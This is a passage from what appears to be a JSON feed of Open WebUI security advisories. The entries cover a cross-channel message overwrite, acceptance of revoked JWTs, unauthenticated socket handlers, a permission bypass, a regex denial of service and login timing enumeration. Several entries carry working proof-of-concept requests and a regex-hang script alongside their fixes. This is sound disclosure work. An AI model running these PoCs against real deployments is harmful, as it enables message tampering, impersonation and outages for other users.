Chats.is_chat_owner(chat_id, user.id) and user.role != 'admin':\n            raise HTTPException(...)\n```\n\n2. **Message ID from user input**: `id` (and each value of the multimodel `message_ids` map) comes directly from the request body and is passed as `message_id` to the channel emitter.\n\n3. **Unchecked database write** (`socket/main.py` `_make_channel_emitter`):\n\n```python\nasync def _make_channel_emitter(request_info):\n    channel_id = request_info['chat_id'].removeprefix('channel:')\n    message_id = request_info['message_id']  # user-supplied\n    ...\n    await Messages.update_message_by_id(message_id, update_form)  # no channel/user authz\n```\n\n`Messages.update_message_by_id` performs a direct primary-key update with no `channel_id`/`user_id` validation.\n\n## Fix (shipped in v0.10.0)\n\nv0.9.6 added a channel gate to the `channel:` branch (PR #24725) that closed the single-model path, but it validated only the first entry of the multimodel `message_ids` map, leaving the multimodel fan-out exploitable. v0.10.0 closes the remaining gap with two layers:\n\n1. **Request-time per-entry validation** (`backend/open_webui/main.py`): every entry of `message_ids` is validated against the target channel, not just the first; any entry whose target message does not belong to the channel in `chat_id` is rejected.\n2. **Fail-closed emitter** (`backend/open_webui/socket/main.py`, `_make_channel_emitter`): before writing, it re-reads the target message and returns without writing unless `msg.channel_id` matches the channel derived from `chat_id`. A missing or mismatched message is a no-op, so a write can no longer land in a channel the caller does not target.\n\n## PoC\n\nSingle-model (fixed in v0.9.6):\n\n```bash\ncurl -X POST http://target:8080/api/chat/completions \\\n  -H \"Authorization: Bearer $USER_JWT\" -H \"Content-Type: application/json\" \\\n  -d '{\n    \"model\": \"llama3\", \"stream\": true,\n    \"chat_id\": \"channel:any-channel-uuid-here\",\n    \"id\": \"target-message-uuid-to-overwrite\",\n    \"messages\": [{\"role\": \"user\", \"content\": \"Repeat exactly: This message has been tampered with\"}]\n  }'\n```\n\nMultimodel (still works on v0.9.6):\n\n```json\nPOST /api/chat/completions\n{\n  \"chat_id\": \"channel:\u003cattacker_channel_id\u003e\",\n  \"message_ids\": {\n    \"model-a\": \"\u003cmessage_id_in_attacker_channel\u003e\",\n    \"model-b\": \"\u003cvictim_channel_message_id\u003e\"\n  },\n  \"messages\": [{\"role\": \"user\", \"content\": \"...\"}]\n}\n```\n\nThe first id passes channel scope validation; the second id is used by the per-model fan-out and overwrites the victim-channel message (with model output, or the provider-error string on a deterministic error). Even a failing model call writes error content to the target message.\n\n## Impact\n\n**Message integrity destruction:** an authenticated user can overwrite a message in a channel they cannot access, regardless of membership. The overwritten message retains the original author attribution while displaying attacker-chosen content (**impersonation**). Private channels, DM channels, and channels the attacker has no access to are all affected; the REST channel routes correctly return 403 for the same attacker, so the bypass is specific to the chat-completion channel pipeline.\n\n## Affected versions\n\n- Single-model path: introduced in commit `0037baeb2` (v0.9.5), fixed in v0.9.6 (#24725).\n- Multimodel `message_ids` path: present from v0.9.6, fixed in v0.10.0.\n- Consolidated Affected: `\u003e= 0.9.5, \u003c 0.10.0`. Patched: `\u003e= 0.10.0`.\n\n## Distinction from existing CVEs\n\nCVE-2026-45385 (GHSA-wwhq-cx22-f7vv) covered IDOR in the REST endpoint `POST /channels/{id}/messages/{message_id}/update` (`routers/channels.py`); its fix (commit `f5e110f`) only touched `channels.py`. This finding uses a different code path (`POST /api/chat/completions` with `chat_id: \"channel:\u003cid\u003e\"` → `main.py` → `socket/main.py:_make_channel_emitter`), untouched by that fix.\n\n## Suggested fix\n\nValidate **every** value in `message_ids` against the channel (not just the first), rejecting any whose target message does not belong to the channel in `chat_id`. Additionally, make `_make_channel_emitter` fail closed: re-check that the target message's `channel_id` matches the channel before calling `Messages.update_message_by_id`, treating a missing or mismatched message as an error/no-op.\n\n## Consolidation\n\nPer Open WebUI's Report Handling policy this advisory consolidates independent reports of the same chat-completions channel-overwrite flaw:\n\n- Single-model cross-channel overwrite via the `channel:` path: @sfwani (earliest filing).\n- Multimodel `message_ids` fan-out variant that bypasses the v0.9.6 first-id-only gate: @DavidCarliez.\n\nOne CVE for the consolidated advisory.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T17:01:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-x2ff-v5v8-m75m","https://github.com/open-webui/open-webui/commit/33e4e0dcc43afcca80f9c635d762cdc76c768ba9","https://github.com/open-webui/open-webui/commit/ac3449cac91e62b08a7c28e54fcd044d14dea791","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-x2ff-v5v8-m75m"],"source_kind":"github","identifiers":["GHSA-x2ff-v5v8-m75m","CVE-2026-59714"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.342Z","epss_percentage":0.00341,"epss_percentile":0.26622,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MmZmLXY1djgtbTc1bc4ABfrO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14MmZmLXY1djgtbTc1bc4ABfrO","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.9.5, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MmZmLXY1djgtbTc1bc4ABfrO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04NTV2LWhxN3ctam1qd84ABfrN","url":"https://github.com/advisories/GHSA-855v-hq7w-jmjw","title":"Open WebUI: Realtime endpoints accept Redis-revoked JWTs after signout/backchannel logout","description":"## Summary\n\nWith Redis configured, Open WebUI supports JWT revocation: `POST /api/v1/auths/signout` (per-token `jti`) and OIDC back-channel logout (per-user `revoked_at`) record revocations in Redis, and HTTP auth (`get_current_user`) rejects revoked tokens with 401. The realtime authentication surfaces do not perform this check: Socket.IO connect / user-join / join-channels / join-note and the terminal websocket first-message auth validate tokens with `decode_token()` only (signature + expiry). A JWT revoked by sign-out or back-channel logout therefore continues to authenticate new realtime connections, even though the same token is rejected on HTTP.\n\n## Affected component\n\n- `backend/open_webui/socket/main.py` — Socket.IO `connect`, `user-join`, `join-channels`, `join-note`\n- `backend/open_webui/routers/terminals.py` — terminal websocket first-message auth\n- `backend/open_webui/utils/auth.py` — the revocation check was applied to HTTP only\n\n## Root cause\n\nHTTP auth enforces revocation:\n\n```python\n# utils/auth.py — get_current_user\nif data.get('jti') and not await is_valid_token(request, data):\n    raise HTTPException(status_code=401, detail='Invalid token')\n```\n\nRealtime auth calls `decode_token()` only, which verifies signature + expiry but never consults the Redis revocation keys (`{prefix}:auth:token:{jti}:revoked`, `{prefix}:auth:user:{id}:revoked_at`):\n\n```python\n# socket/main.py — connect / user-join / join-channels / join-note\ndata = decode_token(auth['token'])\n# routers/terminals.py — _resolve_authenticated_connection\ndata = decode_token(token)\n```\n\n## Impact\n\nA JWT revoked by user sign-out or OIDC back-channel logout still authenticates new realtime connections. A stolen token therefore retains realtime access after the victim signs out or the IdP performs back-channel logout — the very remediation for a compromised token. The token can populate `SESSION_POOL` as the victim, join their user/channel/note rooms (receiving realtime channel messages, collaborative-note updates and presence), drive socket-level collaboration as the victim, and pass terminal websocket authentication when terminal servers are configured. HTTP remains correctly protected (401), so REST data and state-changing REST endpoints are not reachable with the revoked token.\n\n## Proof of Concept\n\nReporter PoC on a Redis-backed deployment (v0.9.6 and main): after `POST /api/v1/auths/signout`, HTTP returns 401 for the token while a Socket.IO user-join with the same token still authenticates, and the terminal WS reaches terminal-server lookup rather than rejecting it as `Invalid token`.\n\n## Fix\n\nApply the revocation check on the realtime paths. The logic is factored into `is_token_revoked(redis, decoded)` (covering per-token `jti` and per-user `revoked_at`); the Socket.IO handlers and the terminal WS reject tokens that fail it, using the main app Redis where revocations are stored. HTTP `is_valid_token` delegates to the same helper, so HTTP behaviour is unchanged.\n\n## Affected / Patched\n\n- Affected: `\u003e= 0.9.0, \u003c 0.10.0`, and only when Redis is configured (without Redis, per-token revocation is not supported and sign-out does not invalidate JWTs by design).\n- Patched: v0.10.0. The revocation check (`is_valid_token`, covering per-token `jti` and per-user `revoked_at`) is applied on Socket.IO connect / user-join / join-channels / join-note and the terminal websocket first-message auth, using the main app Redis where revocations are stored. HTTP `is_valid_token` delegates to the same logic, so HTTP behaviour is unchanged.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T17:00:11.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-855v-hq7w-jmjw","https://nvd.nist.gov/vuln/detail/CVE-2026-59219","https://github.com/open-webui/open-webui/commit/33b91bd8ae8a100a5a306c91441a7d0b422c4cde","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-855v-hq7w-jmjw"],"source_kind":"github","identifiers":["GHSA-855v-hq7w-jmjw","CVE-2026-59219"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T18:00:08.939Z","updated_at":"2026-09-03T03:00:55.343Z","epss_percentage":0.00456,"epss_percentile":0.37648,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NTV2LWhxN3ctam1qd84ABfrN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04NTV2LWhxN3ctam1qd84ABfrN","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.9.0, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NTV2LWhxN3ctam1qd84ABfrN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nbWZ3LWc5M3Itdmc1M84ABfrM","url":"https://github.com/advisories/GHSA-gmfw-g93r-vg53","title":"Open WebUI: Unauthenticated WebSocket Access to Collaborative Document Handlers (ydoc:awareness:update, ydoc:document:leave)","description":"## Summary\n\nThe Socket.IO server is configured with `always_connect=True` (lines 78, 91 in `backend/open_webui/socket/main.py`) and the `connect` handler (line 329) never rejects unauthenticated connections. Two Ydoc event handlers have zero authentication checks, allowing unauthenticated clients to interact with collaborative document sessions.\n\n## Vulnerable Code\n\n### `ydoc:awareness:update` (line 741) — No auth check at all\n```python\n@sio.on('ydoc:awareness:update')\nasync def yjs_awareness_update(sid, data):\n    document_id = data['document_id']\n    user_id = data.get('user_id', sid)\n    update = data['update']\n    # No SESSION_POOL check, no room membership check\n    await sio.emit(\n        'ydoc:awareness:update',\n        {'document_id': document_id, 'user_id': user_id, 'update': update},\n        room=f'doc_{document_id}',\n        skip_sid=sid,\n    )\n```\n\n### `ydoc:document:leave` (line 711) — No auth check at all\n```python\n@sio.on('ydoc:document:leave')\nasync def yjs_document_leave(sid, data):\n    document_id = data['document_id']\n    user_id = data.get('user_id', sid)\n    # No auth check\n    await YDOC_MANAGER.remove_user(document_id=document_id, user_id=sid)\n    await sio.emit('ydoc:user:left',\n        {'document_id': document_id, 'user_id': user_id},\n        room=f'doc_{document_id}')\n```\n\n### Root Cause: `always_connect=True` (line 78)\n```python\nsio = socketio.AsyncServer(\n    always_connect=True,   # Never rejects connections\n    ...\n)\n```\n\nThe `connect` handler (line 329) adds authenticated users to `SESSION_POOL` but never returns `False` or raises an exception for unauthenticated connections.\n\n## Exploitation\n\n1. An unauthenticated attacker connects via Socket.IO (no token needed)\n2. The attacker emits `ydoc:awareness:update` with:\n   - `document_id`: a known/guessed note UUID (format: `note:{uuid}`)\n   - `user_id`: spoofed to impersonate any user\n   - `update`: arbitrary awareness data (fake cursor positions, selections)\n3. The fake awareness data is broadcast to all legitimate users in the document room\n4. The attacker can also emit `ydoc:document:leave` with spoofed `user_id` to broadcast fake `ydoc:user:left` events\n\n## Impact\n\n- **UI disruption**: Fake cursor positions and user presence in collaborative editing sessions\n- **User impersonation**: Attacker can spoof any `user_id` in awareness updates\n- **Resource exhaustion**: Unlimited unauthenticated WebSocket connections maintained by the server\n\nNote: Other Ydoc handlers (`ydoc:document:join`, `ydoc:document:update`, `ydoc:document:state`) correctly check `SESSION_POOL` membership.\n\n## Suggested Fix\n\n1. Set `always_connect=False` or reject unauthenticated connections in the `connect` handler\n2. Add `SESSION_POOL` checks to `ydoc:awareness:update` and `ydoc:document:leave`\n3. Add room membership verification before broadcasting to document rooms\n\n---\n\n\u003e **AI Disclosure (per Rule 11):** AI (Claude) was used to assist with source code review, identifying potential vulnerability patterns, and drafting this report. The researcher directed the analysis, selected focus areas, and independently verified all findings against a running v0.8.12 Docker instance using real HTTP requests with two test accounts. The PoCs included are reproducible and were confirmed live before submission.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-07-24T16:59:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-gmfw-g93r-vg53","https://nvd.nist.gov/vuln/detail/CVE-2026-59715","https://github.com/open-webui/open-webui/pull/25946","https://github.com/open-webui/open-webui/commit/22f2fe1ffb66c993dad1e0b2b35514acaed2370e","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-gmfw-g93r-vg53"],"source_kind":"github","identifiers":["GHSA-gmfw-g93r-vg53","CVE-2026-59715"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T17:00:09.078Z","updated_at":"2026-09-03T03:00:55.344Z","epss_percentage":0.00222,"epss_percentile":0.12744,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nbWZ3LWc5M3Itdmc1M84ABfrM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nbWZ3LWc5M3Itdmc1M84ABfrM","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.6.16, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nbWZ3LWc5M3Itdmc1M84ABfrM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ycWo3LTZ3cnAtNmcyZ84ABfrL","url":"https://github.com/advisories/GHSA-rqj7-6wrp-6g2g","title":"Open WebUI: POST /api/v1/images/edit bypasses the global image-edit switch and the per-user image-generation permission","description":"## Summary\n\n`POST /api/v1/images/edit` performed no authorization beyond requiring a verified account. Every other image-editing surface in Open WebUI enforces the global image-edit switch and the per-user image-generation permission — the `/api/v1/images/generations` route, the built-in `edit_image` tool, and the chat image-edit middleware — but the direct edit route enforced neither. A verified non-admin user could therefore invoke server-side image editing, reaching the configured image-edit provider with the administrator's credentials, even when the administrator had globally disabled image editing (`ENABLE_IMAGE_EDIT=False`) or denied that user image-generation permission. The image-editing UI is surfaced only to administrators (Playground), so the route additionally exposed an admin-only capability to any verified user.\n\n## Impact\n\nAn authenticated, non-admin user can:\n\n- bypass the global `ENABLE_IMAGE_EDIT=False` administrator control;\n- bypass a denied per-user/group `features.image_generation` permission;\n- cause the server to send billable image-edit requests to the configured provider (OpenAI-compatible, Gemini, or ComfyUI) using administrator-configured credentials (`IMAGES_EDIT_OPENAI_API_KEY` for the OpenAI engine).\n\nNo cross-user data is exposed and the provider credentials are never returned to the caller; the impact is the control/permission bypass and the associated billable resource consumption.\n\n## Affected Versions\n\n`\u003e= 0.8.11, \u003c 0.10.0` (the `/api/v1/images/edit` route was introduced in 0.8.11 and was ungated from the outset). Fixed in **v0.10.0**.\n\n## Details\n\n`/api/v1/images/generations` enforces `ENABLE_IMAGE_GENERATION` (403 if globally disabled) and `features.image_generation` (403 for non-admins without the permission). The `edit_image` built-in tool and the chat image-edit middleware likewise gate on `ENABLE_IMAGE_EDIT` and `features.image_generation`. The direct `POST /api/v1/images/edit` route ran on `Depends(get_verified_user)` alone and proceeded straight to provider dispatch, applying none of these controls.\n\n## Proof of Concept\n\nAs a verified non-admin user, with image editing globally disabled (`ENABLE_IMAGE_EDIT=False`) or `features.image_generation` denied for the user:\n\n```http\nPOST /api/v1/images/edit\nAuthorization: Bearer \u003cnon_admin_user_token\u003e\nContent-Type: application/json\n\n{\"image\":\"data:image/png;base64,\u003cpng\u003e\",\"prompt\":\"edit\",\"model\":\"gpt-image-1\"}\n```\n\nThe request reaches the configured image-edit provider and returns an edited image despite the disabled control/permission.\n\n## Patch\n\nThe direct route is split from its shared implementation (mirroring `generate_images`/`image_generations`): a thin `/edit` route now enforces `ENABLE_IMAGE_EDIT` and the per-user `features.image_generation` permission before delegating to the shared `image_edits()` implementation. The internal callers (the `edit_image` tool and the chat middleware) call the implementation directly and already gate themselves, so they are unaffected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T16:58:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-rqj7-6wrp-6g2g","https://nvd.nist.gov/vuln/detail/CVE-2026-59227","https://github.com/open-webui/open-webui/pull/26009","https://github.com/open-webui/open-webui/commit/e038bab66dec8d17212eec35b5cb6d6b785a4200","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-rqj7-6wrp-6g2g"],"source_kind":"github","identifiers":["GHSA-rqj7-6wrp-6g2g","CVE-2026-59227"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T17:00:09.078Z","updated_at":"2026-09-03T03:00:55.345Z","epss_percentage":0.00259,"epss_percentile":0.17217,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycWo3LTZ3cnAtNmcyZ84ABfrL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ycWo3LTZ3cnAtNmcyZ84ABfrL","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.8.11, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycWo3LTZ3cnAtNmcyZ84ABfrL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mZnBqLXh2NWMtcDNnd84ABfrK","url":"https://github.com/advisories/GHSA-ffpj-xv5c-p3gw","title":"Open WebUI: ReDoS in skill-mention regexes causes whole-instance DoS on default config","description":"## Summary\nTwo regexes in `backend/open_webui/utils/middleware.py` that parse `\u003c$skillId|label\u003e` skill-mention tags backtrack in O(n²) on input that contains `\u003c$` followed by a long run with no closing `\u003e`. Both run synchronously, on the asyncio event loop, on **every** chat completion with no feature gate. Because the default deployment is a single uvicorn worker, one such input pins a CPU core inside `re` and freezes the entire instance for all users until the worker is killed. Any authenticated user can trigger it with one chat message; it also fires accidentally on benign retrieved content (a RAG chunk or tool output) containing the pattern.\n\n## Affected versions\n`\u003e= 0.9.2, \u003c 0.10.0`. Fixed in **v0.10.0** (there is no 0.9.7 release).\n- `SKILL_MENTION_RE` (the extract pattern) has been O(n²) since **v0.9.2**; exploitable on 0.9.2–0.9.5 with a large input (hundreds of KB).\n- **v0.9.6** added a second, far more aggressive O(n²) in the strip pattern (introduced by the \"keep label as readable text\" change), so on 0.9.6 a small input is enough to hang the instance.\n\nBoth are fixed by the same patch.\n\n## Affected component\n`backend/open_webui/utils/middleware.py` (line numbers as of v0.9.6):\n\n```python\n# line 2223 — used by extract_skill_ids_from_messages(), called unconditionally (~line 2625)\nSKILL_MENTION_RE = re.compile(r'\u003c\\$([^|\u003e]+)\\|?[^\u003e]*\u003e')\n\n# line 2247 — used by strip_skill_mentions(), called unconditionally (line 2662)\nstrip_re = re.compile(r'\u003c\\$[^|\u003e]+\\|?([^\u003e]*)\u003e')\n```\n\n`extract_skill_ids_from_messages()` runs before the `if all_skill_ids:` block (that guard gates only skill *injection*, not the regex), and `strip_skill_mentions()` runs with no guard at all. Neither requires a skill to exist or any setting to be enabled. Both functions are plain synchronous calls inside the async `process_chat_payload` coroutine, so they block the event loop; with the default `UVICORN_WORKERS=1` (`backend/start.sh`) the whole instance stalls.\n\n## Root cause\n`[^|\u003e]` is a subset of `[^\u003e]`, so the quantifier pair `[^|\u003e]+ \\|? [^\u003e]*` is ambiguous: on input that never closes with `\u003e`, `[^|\u003e]+` greedily consumes the tail, `\u003e` fails, and the engine backtracks through every split point between `[^|\u003e]+` and `[^\u003e]*` — O(n) positions each doing O(n) work. Polynomial, not exponential, but more than enough to hang a single worker on a ~100 KB input.\n\n## Proof of concept\nStandalone (no Open WebUI required):\n\n```python\nimport re, time\nEXTRACT = re.compile(r'\u003c\\$([^|\u003e]+)\\|?[^\u003e]*\u003e')\nSTRIP   = re.compile(r'\u003c\\$[^|\u003e]+\\|?([^\u003e]*)\u003e')\nfor n in (8_000, 16_000, 32_000, 64_000):\n    s = '\u003c$' + ('a' * n)\n    for name, rx in (('extract', EXTRACT), ('strip', STRIP)):\n        t = time.perf_counter(); rx.search(s)\n        print(f'n={n:\u003e6} {name:\u003e7} = {(time.perf_counter()-t)*1000:8.1f} ms')\n```\n\nTime quadruples per doubling of `n` (textbook O(n²)); the strip pattern runs for ~6 seconds on a 64k blob and for minutes on a ~96 KB one.\n\nEnd-to-end against a live instance (default config):\n1. `docker run ghcr.io/open-webui/open-webui:v0.9.6` on defaults.\n2. Log in as any user (no admin or skill setup).\n3. Send a chat message containing `\u003c$` followed by 50k+ characters with no `\u003e`.\n4. One CPU core pegs in `re`; UI and API stop responding for every user until the worker is killed.\n\n## Patch\nRewrite the optional `|label` as a non-capturing optional group so the two quantifiers no longer overlap. Both patterns become linear; captures and substituted output are unchanged on well-formed `\u003c$id|label\u003e`, `\u003c$id|\u003e`, and bare `\u003c$id\u003e` mentions.\n\n```python\nSKILL_MENTION_RE = re.compile(r'\u003c\\$([^|\u003e]+)(?:\\|[^\u003e]*)?\u003e')\nstrip_re         = re.compile(r'\u003c\\$[^|\u003e]+(?:\\|([^\u003e]*))?\u003e')\n```\n\nAfter the patch the same hostile input returns in under 1 ms. Shipped in v0.10.0.\n\n## Credit\nReported by @Vlad-WKG, including a correct root-cause analysis and patch.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T16:55:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-ffpj-xv5c-p3gw","https://nvd.nist.gov/vuln/detail/CVE-2026-59220","https://github.com/open-webui/open-webui/commit/61a26722155ec6ee1b629cf8dfcf975098c18331","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-ffpj-xv5c-p3gw"],"source_kind":"github","identifiers":["GHSA-ffpj-xv5c-p3gw","CVE-2026-59220"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T17:00:09.078Z","updated_at":"2026-09-03T03:00:55.346Z","epss_percentage":0.00573,"epss_percentile":0.44733,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mZnBqLXh2NWMtcDNnd84ABfrK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mZnBqLXh2NWMtcDNnd84ABfrK","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.9.2, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mZnBqLXh2NWMtcDNnd84ABfrK/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tdng0LTUzMnAteGZtOc4ABfrJ","url":"https://github.com/advisories/GHSA-mvx4-532p-xfm9","title":"Open WebUI: Scheduled automations continue after pending-user deactivation and stored model ACL revocation","description":"**Title:** Scheduled automations continue after pending-user deactivation and stored model ACL revocation\n\n### Summary\n\nOpen WebUI documents `pending` as a zero-access role used for new sign-ups and deactivated users, and normal HTTP routes enforce that with `get_verified_user()` (which rejects `pending`), while automation create/update/run routes additionally require the `features.automations` permission. Two paths missed that lifecycle gate, so a deactivated (`pending`) account could keep acting through the background automation scheduler:\n\n1. **Scheduler did not re-gate the owner.** When a stored automation became due, `execute_automation()` rehydrated the owner with `Users.get_user_by_id(...)` and re-entered the chat completion pipeline without re-checking that the owner was still `user`/`admin` or still held `features.automations`. A still-active automation therefore kept running after its owner was deactivated.\n2. **Model ACL only enforced for exact role `user`.** `check_model_access()` applied private-model grants only when `user.role == \"user\"`, so a `pending` principal fell through a branch that denies a normal non-owner `user`.\n\nNet effect: a deactivated account could continue scheduled chat generation through the background worker, consuming the operator's configured model-provider credentials and reaching a stored automation model ID that its current role/ACL state would no longer permit through normal routes.\n\n### Impact\n\nA `pending`/deactivated account continues to execute due scheduled automations after its access has been revoked, consuming the operator's provider credentials, quota and shared capacity, and bypassing the private-model ACL for the automation's stored model ID. Exploitation requires a previously created active automation and a later transition to `pending` (deactivation or approval rollback), so it is bounded and not interactive. It does not grant unauthenticated access, account takeover, code execution, or cross-user data exfiltration.\n\n### Patched\n\nIn 0.10.0:\n\n- `execute_automation()` aborts and records an error unless the rehydrated owner is still `user` or `admin` and (for non-admins) still holds `features.automations`, so a deactivated or de-permissioned owner's due automation no longer runs.\n- `check_model_access()` enforces model ACLs for every non-admin role rather than only the exact role `user`, so a `pending` or otherwise unrecognised role no longer falls through.\n\n### Credits\n\n@rexpository","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-07-24T16:55:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-mvx4-532p-xfm9","https://nvd.nist.gov/vuln/detail/CVE-2026-59226","https://github.com/open-webui/open-webui/pull/26047","https://github.com/open-webui/open-webui/commit/920b655f4689e2118de928fbc936f6ebd4fed396","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-mvx4-532p-xfm9"],"source_kind":"github","identifiers":["GHSA-mvx4-532p-xfm9","CVE-2026-59226"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T17:00:09.078Z","updated_at":"2026-09-03T03:00:55.346Z","epss_percentage":0.00303,"epss_percentile":0.22508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tdng0LTUzMnAteGZtOc4ABfrJ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tdng0LTUzMnAteGZtOc4ABfrJ","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003e= 0.9.0, \u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tdng0LTUzMnAteGZtOc4ABfrJ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03cnc1LTlmN3EteGozNs4ABfrI","url":"https://github.com/advisories/GHSA-7rw5-9f7q-xj36","title":"Open WebUI: Account enumeration via observable login timing discrepancy","description":"### Summary\n\nThe `/api/v1/auths/signin` endpoint leaked whether an email address belonged to a registered account through a response-time side channel. Password verification ran bcrypt only when the email was found in the database; for a non-existent email the request returned early without hashing. The expensive bcrypt comparison therefore made valid-account attempts respond significantly slower (~180 ms) than non-existent ones (~5 ms), so an unauthenticated attacker could enumerate valid accounts by measuring response time.\n\n### Details\n\nOn signin the backend looked the user up by email and only performed the bcrypt password comparison if a record existed. A missing email short-circuited before any hashing, producing the timing gap. The built-in brute-force throttling did not prevent it: sending one request at a time with a small delay between requests stays under the rate limit while still exposing the difference.\n\nObserved in the reporter's run (HTTP 400 for every attempt, the response time is the signal):\n\n```\nEmail                Status   Response time\njoe@example.com      400      186 ms   \u003c- valid account\nlarry@example.com    400        9 ms\njose@example.com     400        6 ms\njames@example.com    400        5 ms\n```\n\n### Impact\n\nAn unauthenticated attacker can enumerate which email addresses are registered accounts, which enables targeted password-spraying against confirmed accounts. The impact is amplified by MFA not being enabled by default. No data is read or modified; the disclosure is limited to account existence.\n\n### Patched\n\nThe authentication path now runs a bcrypt verification against a constant placeholder hash whenever the email does not resolve to an active credential, so a real hash comparison executes on every attempt and the response time is the same whether or not the account exists. Fixed in 0.10.0.\n\n### 